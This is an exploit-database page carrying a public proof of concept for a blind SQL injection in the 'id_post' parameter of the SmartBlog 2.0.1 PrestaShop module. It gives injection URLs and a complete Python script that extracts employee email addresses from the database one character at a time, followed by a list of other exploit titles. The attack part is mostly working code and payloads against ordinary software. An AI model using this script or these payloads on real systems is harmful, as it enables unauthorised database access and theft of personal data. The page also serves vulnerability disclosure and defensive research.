To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"SmartBlog 2.0.1 - 'id_post' Blind SQL injection"

Author

Exploit author

C0wnuts

Platform

Exploit platform

php

Release date

Exploit published date

2020-11-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
# Exploit Title: SmartBlog 2.0.1 - 'id_post' Blind SQL injection
# Date: 2020-11-05
# Exploit Author: C0wnuts
# Vendor Homepage: https://github.com/smartdatasoft/smartblog
# Version: 2.0.1
# Tested on: Linux

# Description : A blind SQL injection is present in the "id_post" parameter of the "details" controller. It allows you to extract information from the database by means of successive character tests.

# POC: 

# -------------------------
# http://localhost/[script_path]/index.php?fc=module&module=smartblog&id_post=<valid post number> or {SQL}&controller=details
# -------------------------
# Exemple:

# 1. Test if the first character of the database name is "t":
# http://localhost/index.php?fc=module&module=smartblog&id_post=1 or substring(DATABASE(),1,1)='t'&controller=details

# 2. Test if the first character of the email of the first account is "a":
# http://localhost/index.php?fc=module&module=smartblog&id_post=1 or substring((SELECT email FROM ps_employee LIMIT 1 offset 0),1,1)='a'&controller=details
# -------------------------
# Script PYTHON (python 3)


import requests, string
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry

initialUrl  = 'https://localhost.com/index.php?fc=module&module=smartblog&id_post=4329824944'
endOfUrl    = '&controller=details'
# Change this to http:// if the website is not in https
protocol    = "https://"
offset      = 0
endData     = 0
end         = 0
iteration   = 0
charList    = string.printable

# The character returned by the db when you reach the end of the extracted information. In my case that was "+" but it can be "\", or " " or whatever. /!\ Just test and hange this value according to your needs /!\
endChar     = "+"
# The length of the page when the SQLI failed. In my case that was 16094. If the lenght of the content of the page is higher than this value is that the character tested is the right one. /!\ Just test and hange this value according to your needs /!\.
FailPageLen = 17000


# Mysql is not case sensitive but if the db used by the website is cse sensitive remove the following line
charList   = charList.replace("ABCDEFGHIJKLMNOPQRSTUVWXYZ","")

while endData == 0:
	contentInfo = ""
	iteration   = 0
	end = 0
	while end == 0:
		iteration = iteration + 1
		for elem in charList:
			url            = initialUrl
			
			#This request get email of all employee. Replace the request by whatever you want but keep in mind that the script extract information 1 character by 1 character then you need to keep '+str(offset)+' and substring(,'+str(iteration)+',1). "elem" is the character tested
			request        = '%20or%20substring((SELECT%20email%20FROM%20ps_employee%20LIMIT%201%20offset%20'+str(offset)+'),'+str(iteration)+',1)=%27'+elem+'%27'
			
			url += request + endOfUrl
			retry_strategy = Retry(
				total = 30, 
				backoff_factor = 0.2, 
				method_whitelist = ["GET" "POST"]
			)
			adapter  = HTTPAdapter(max_retries=retry_strategy)
			http     = requests.Session()
			http.mount(protocol, adapter)
			response = http.get("{}".format(url))

			if len(response.content) > FailPageLen:
				print(contentInfo)
				if(elem == endChar):
					end = 1
					if contentInfo == "":
						endData = 1
				else:
					contentInfo = contentInfo + elem
					break
		if contentInfo == "":
			endData = 1
	print(contentInfo)
	offset = offset + 1
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-11-06 "SmartBlog 2.0.1 - 'id_post' Blind SQL injection" webapps php C0wnuts
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48995/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.